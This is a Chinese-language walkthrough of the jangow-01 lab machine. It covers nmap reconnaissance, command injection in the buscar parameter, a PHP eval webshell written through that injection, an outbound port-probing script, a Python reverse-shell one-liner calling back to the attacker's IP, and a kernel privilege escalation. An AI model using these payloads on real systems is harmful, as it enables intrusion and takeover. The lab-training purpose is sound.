前言

靶机：jangow-01-1.0.1
攻击机：kali linux2022.4
靶机描述

打靶ing

靶机探测

使用nmap扫描网段

点击查看代码

┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.70.0/24       
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 20:56 EST
Nmap scan report for 192.168.70.1
Host is up (0.00012s latency).
All 1000 scanned ports on 192.168.70.1 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.70.2
Host is up (0.000056s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
53/tcp open  domain
MAC Address: 00:50:56:FE:42:C8 (VMware)

Nmap scan report for 192.168.70.152
Host is up (0.00027s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
MAC Address: 00:0C:29:67:A6:61 (VMware)

Nmap scan report for 192.168.70.254
Host is up (0.00022s latency).
All 1000 scanned ports on 192.168.70.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:EA:9C:6A (VMware)

Nmap scan report for 192.168.70.137
Host is up (0.0000070s latency).
All 1000 scanned ports on 192.168.70.137 are in ignored states.
Not shown: 1000 closed tcp ports (reset)

Nmap done: 256 IP addresses (5 hosts up) scanned in 11.44 seconds

发现靶机ip：192.168.70.152

扫描开放端口信息

点击查看代码

┌──(root㉿kali)-[/home/kali]
└─# nmap -A -p- 192.168.70.152 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 20:59 EST
Nmap scan report for 192.168.70.152
Host is up (0.00042s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.18
|_http-title: Index of /
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2021-06-10 18:05  site/
|_
MAC Address: 00:0C:29:67:A6:61 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.42 ms 192.168.70.152

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.11 seconds

查看网站信息

先访问80端口

可以发现是一个目录遍历，查找一下有用信息
在site目录下发现一个网站

漏洞探测

四处看看功能点

发现了一个可以传参得接口
http://192.168.70.152/site/busque.php?buscar=

对变量buscar进行测试
传入参数1

没什么回显，传入id

在该参数发现存在rce

漏洞利用

利用该漏洞写入webshell
payload
192.168.70.152/site/busque.php?buscar=echo '<?php @eval($_POST["shell"]); ' > shell.php

查看目录写入成功
使用蚁剑连接木马

成功连接shell

收集靶机信息

home的用户目录中看到了user.txt

是一段md值使用somd5解码

点此即达-->somd5

这里可以发现是空密码

目前不知道有什么用

反弹shell+提升权限

写个脚本端口是否被限制

点击查看代码

#!/bin/bash
for i in {1..65535};
do
    timeout 1 nc -vz 192.168.70.137 $i && echo "$i open" >> out.txt || echo "$i closed" >> out.txt;
done

kali设置防火墙权限
iptables -A PREROUTING -t nat -p tcp --dport 1:65535 -j REDIRECT --to-port 1234
然后打开nc监听端口

赋予权限运行脚本

对防火墙做了端口绑定所以直接监听1234端口即可，目标主机连接kali的443端口就可以反弹shell了

点击查看代码

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.70.137",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

拿到完整shell之后查看内核信息

ubuntu16.04直接查找相关得exp

上传exp

编译赋权执行

提权成功

查看root目录找找flag

之前用户目录也获取到了md5值，应该就是这个靶机得flag了